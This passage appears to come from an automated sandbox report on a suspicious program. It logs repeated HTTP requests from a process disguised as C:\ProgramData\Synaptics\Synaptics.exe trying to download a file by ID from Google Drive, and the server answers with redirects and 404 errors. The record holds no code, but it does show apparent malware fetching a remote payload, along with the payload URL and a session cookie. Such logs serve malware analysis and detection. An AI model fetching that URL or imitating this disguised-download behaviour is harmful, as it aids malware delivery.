                                                                                                                                                                2024-12-25 08:08:23 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="PCREBxjjI9828Khp-c63bg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                2024-12-25 08:08:23 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                46 | 192.168.2.4 | 49956 | 142.250.181.97 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:08:22 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                                                                                                                                                2024-12-25 08:08:23 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC4_VHd_DHUS-yvVglPwMuVHfMUwJxmocH_T_G-zVvfG3_xIUFRAIxrGCQZ1etoasOhx
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:23 GMT
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-_bfRP3NYFEcC_-4xr6hsDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:08:23 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                2024-12-25 08:08:23 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="E515-Ule0xCipVTKbho-vA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                2024-12-25 08:08:23 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                47 | 192.168.2.4 | 49969 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-25 08:08:25 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-25 08:08:26 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:26 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-fbESnhrO3t365r2Z2CD4ww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 49970 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:25 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
2024-12-25 08:08:26 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:26 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-v7W6HZAwFp6OfT5z6Z8UNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.4 | 49981 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:28 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
2024-12-25 08:08:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:28 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-PraN2uot2P5iROHWHSJsiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 49983 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:28 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
2024-12-25 08:08:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:29 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-sc3fVHBEKJgKppc9Wz3NMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 49982 | 142.250.181.97 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:28 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
2024-12-25 08:08:29 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC5G0AM4hUSJeI6h3e2L7oWK-D2wJcZ-3KJu4sjfmC5ol39mQ4N3dgPQjsP0uQdfLNOJ94Zog5k
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:29 GMT
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-fiO4YhprWCb9ItcHu0vU8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
2024-12-25 08:08:29 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-25 08:08:29 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="lCHqovDb4WKm2GrDOCHhUQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-25 08:08:29 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 49980 | 142.250.181.97 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:28 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 49998 | 142.250.181.97 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:31 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
2024-12-25 08:08:32 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC7OgGrtJyLz_nvUtQ3y97wxkGnIvqplsCqMB_BI57gpw1MPEq-rDhLhsw18LbPGhyik
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:31 GMT
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-bP9JUtOrZbkyrIFlxoeDgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
2024-12-25 08:08:32 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-25 08:08:32 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="Sj-sK_kaHlKenot7XrPEdg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-25 08:08:32 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 50000 | 142.250.181.97 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:31 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
2024-12-25 08:08:32 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC6u-0oQpt31XDUPCt26kfr5onLFzZWnLLjXeHFmgGub9Lqr0kjLHmEL43DnK7FnA4bB
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:32 GMT
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-4KbNiu16GpxBN4soZuVXWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
2024-12-25 08:08:32 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-25 08:08:32 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="JkthBepycmSVriza2KMhRw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-25 08:08:32 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 50001 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:31 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
2024-12-25 08:08:32 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:31 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-aLf-gpQQFlYPgsrxs6o2JQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 50002 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:08:31 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
2024-12-25 08:08:32 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:08:31 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-mzYR1Cg6mzW-v3TuErnYOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
